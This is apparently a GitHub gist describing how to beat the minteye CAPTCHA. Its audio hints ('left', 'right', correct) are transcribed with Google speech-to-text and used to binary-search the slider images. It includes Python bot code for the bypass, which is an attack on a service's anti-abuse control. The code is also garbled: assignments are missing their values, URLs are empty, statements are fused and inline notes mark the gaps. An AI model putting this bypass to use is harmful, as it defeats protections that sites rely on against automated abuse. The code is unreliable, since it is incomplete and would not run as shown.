Create a gist now

Instantly share code, notes, and snippets.

minteye is a CAPTCHA system in which you try to pick the original image out of a series of distorted ones. Their website has a feature list, but it leaves out how the system looks from a computer's point of view. I fixed it:

minteye captcha features

There are two ways to crack this captcha easily. I've used the audio challenge. There are three different kinds of audio messages.

  1. move the slider to the right
  2. move the slider to the left
  3. slider is in the correct position

1 and 2 are very long sentences and 3 is a very short sentence. I've used Google Chrome's speech-to-text API to convert the audio into text. The text I get back is total nonsense, but it recognizes "left" and "right", which is sufficient to determine the next move of the slider. Here is a small video which shows the code in action:

YouTube Video Demo

minteye should have a look at how reCaptcha obscures the audio. But the underlying problem will always be the small number of distinct messages.

kind regards,

personal Website
I'm a member of the Stuttgart Hackerspace - shackspace

edit: to see really cool stuff with reCaptcha, check out what they did:

import httplib, re, urllib2, json, subprocess, StringIO, Tkinter, ImageTk, traceback
from PIL import Image
tmp_folder = 'tmp/'
file_prefix = 'test_'
class Logger():
    """Minimal level-filtered logger that writes to standard output.

    A message is printed only when its level is less than or equal to the
    level the logger was created with, so a logger created with the default
    level of 0 suppresses messages logged at the default message level of 1.
    """

    def __init__(self, level=0):
        """Create a logger that prints messages up to and including *level*."""
        self.level = level

    def log(self, level=1, msg=''):
        """Print *msg* as ``[level] msg`` if *level* is enabled; return None."""
        if self.level >= level:
            # A single parenthesised argument prints the same text whether
            # ``print`` is the Python 2 statement or the Python 3 function.
            print('[%d] %s' % (level, msg))
# Client for the minteye captcha service: keeps the captcha id, public key and
# session state, and wraps the image, audio and speech-recognition requests.
# NOTE(review): this copy of the class has lost its indentation and several
# statements/expressions (flagged below); it is not runnable as shown.
class MinteyeCaptcha:
# Stores the captcha parameters, creates a Logger with verbosity DEBUG and an
# httplib connection. SessionId and cid start as None; initiate() assigns them.
def __init__(self,CaptchaId='4025',PublicKey='8fce9e8a-dc61-4b04-b2a4-61e9ded571a2',Dummy='random_dummy',DEBUG=0):
self.CaptchaId = CaptchaId
self.PublicKey = PublicKey
self.Dummy = Dummy
self.logging = Logger(DEBUG)
# NOTE(review): the host argument is an empty string in this copy.
self.apiconn = httplib.HTTPConnection('')
self.logging.log(1,'created MintEye id: '+CaptchaId)
self.SessionId = None
self.cid = None
# Extracts the challenge id (self.cid) from `content` and the ASP.NET session
# id (self.SessionId) from the response's set-cookie header.
def initiate(self):
# NOTE(review): no request is issued before getresponse() here — presumably a
# self.apiconn.request(...) line was lost; confirm against the original gist.
req = self.apiconn.getresponse()
# NOTE(review): right-hand side missing — presumably the response body.
content =
# First regex match of the quoted value following "Challenge: ".
self.cid = re.findall(r'.*Challenge: \'([a-z0-9\-]+)\',.*',content)[0]
self.logging.log(1,'cid: '+self.cid)
headers = req.getheaders()
self.SessionId = re.findall(r'.*ASP.NET_SessionId=([a-z0-9]+);.*',dict(headers)['set-cookie'])[0]
self.logging.log(1,'SessionId: '+self.SessionId)
# NOTE(review): second getresponse() with no visible request in between.
req = self.apiconn.getresponse()
# NOTE(review): the log call is fused with an ['rm', ...] argument list and a
# stray ')' — presumably a separate call that ran `rm` on the tmp files was
# merged into this line; confirm.
self.logging.log(1,'clear tmp dir')['rm',tmp_folder+file_prefix+'*'])
# Returns `content` for slider position `val`; also overwrites self.Dummy.
def getaudio(self,val=0):
self.logging.log(1,'get audio: '+str(val))
self.Dummy = '1234567'
# Cookie header string built from the session id; in this copy it is never
# passed to a request and is overwritten two lines below.
headers = 'Cookie: ASP.NET_SessionId='+self.SessionId
# NOTE(review): no request precedes getresponse() in this copy.
req = self.apiconn.getresponse()
headers = req.getheaders()
# NOTE(review): right-hand side missing — presumably the response body.
content =
return content
# Fetches the captcha image for slider position `val` and returns `content`.
def getimg(self,val=0):
self.logging.log(1,'get image: '+str(val))
# NOTE(review): the base URL (leading '') is empty in this copy. The query
# string carries the public key, a fixed 300x250 size, the dummy value, the
# challenge id and the image index.
req = urllib2.urlopen(''+self.PublicKey+'&w=300&h=250&dumm='+self.Dummy+'&reqid='+self.cid+'&img='+str(val))
# NOTE(review): right-hand side missing — presumably the response body.
content =
return content
# Converts captcha audio to text: .wav file -> .flac file -> HTTP request whose
# JSON reply's first hypothesis utterance is returned.
def audio2text(self,audio,val=0):
self.logging.log(1,'create .wav file')
f = open(tmp_folder+file_prefix+str(val)+'.wav','wb')
# NOTE(review): nothing writes `audio` to f or closes it in this copy.
# NOTE(review): the log call below is fused with an ffmpeg argument list and a
# stray ')' — presumably a separate call that ran ffmpeg was merged in; confirm.
self.logging.log(1,'convert audio .wav to .flac')["ffmpeg", "-i", tmp_folder+file_prefix+str(val)+'.wav', tmp_folder+file_prefix+str(val)+'.flac','-loglevel','quiet','-y'])
f = open(tmp_folder+file_prefix+str(val)+'.flac','rb')
# NOTE(review): right-hand side missing — presumably the .flac file contents.
audio =
self.logging.log(1,'audio2text via google')
# NOTE(review): the recognition URL is an empty string in this copy.
url = ""
request = urllib2.Request(url)
request.add_header('Content-type','audio/x-flac; rate=8000')
request.add_header('Content-length', str(len(audio)))
# NOTE(review): `audio` is never attached to the request in this copy.
response = urllib2.urlopen(request)
# NOTE(review): the json.loads( call is unterminated — its argument is missing.
content = json.loads(
return content['hypotheses'][0]['utterance']
# NOTE(review): the three error logs below look like bodies of except clauses
# whose try/except lines were lost; "elf" is presumably a truncated "self".
elf.logging.log(2,'ERROR: audio2text via google')
self.logging.log(2,'ERROR: convert audio .wav to .flac')
self.logging.log(2,'ERROR: create .wav file')
# Module-level state shared with the next_image key handler.
cracker = MinteyeCaptcha(DEBUG=2)
found = False
# Lower and upper image indices bounding the binary search.
binary_search = [0, 29]
root = Tkinter.Tk()
# Placeholders that next_image fills in with the current image and its
# Tk photo wrapper.
image = tkpi = None
label_image = Tkinter.Label(root)
# Key handler: performs one binary-search step over the image indices. It shows
# the midpoint image, fetches its audio hint, converts the hint to text and
# narrows the search range according to "left"/"right" in that text.
# NOTE(review): indentation and some lines are missing in this copy (see below).
def next_image(event):
global binary_search, found, cracker, Tkinter, tkpi, label_image, root, image
# Midpoint of the current range (integer division under Python 2).
val = (binary_search[0]+(binary_search[1]-binary_search[0])/2)
print "===== binary search try Image #%d (%d,%d) =====" % (val,binary_search[0],binary_search[1])
root.title('Image #'+str(val))
img = cracker.getimg(val)
# NOTE(review): right-hand side missing — presumably a PIL image built from
# `img`, since .size is read on the next line; confirm.
image =
# Resize the window to the image dimensions.
root.geometry('%dx%d' % (image.size[0],image.size[1]))
tkpi = ImageTk.PhotoImage(image)
label_image.configure(image = tkpi)
# Keep a reference on the label as well as in the global `tkpi`.
label_image.image = tkpi
audio = cracker.getaudio(val)
# NOTE(review): `val` is not passed on, so audio2text uses its default val=0.
text = cracker.audio2text(audio)
print "\nGoogle says:\n%s\n" % text
# A transcript longer than 50 characters is treated as a "move the slider"
# hint; only its first 50 characters are searched for the direction word.
if len(text)>50:
if "left" in text[0:50]:
# "left": the midpoint becomes the new upper bound.
binary_search[1] = val
elif "right" in text[0:50]:
# "right": the midpoint becomes the new lower bound.
binary_search[0] = val
# NOTE(review): presumably the inner `else:` (neither word recognised) and the
# outer `else:` (short transcript, i.e. correct position) were lost before the
# following lines; confirm against the original gist.
print "error?"
print "\nFound valid Picture #"+str(val)
found = True
# Position the window at offset (300, 250) and run one search step each time
# the space bar is pressed.
root.geometry('+%d+%d' % (300, 250))
root.bind('<space>', next_image)
Unknown commented Sep 1, 2014

Doesn't work for the high security level because it uses a different distortion technique. You can see it on .

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment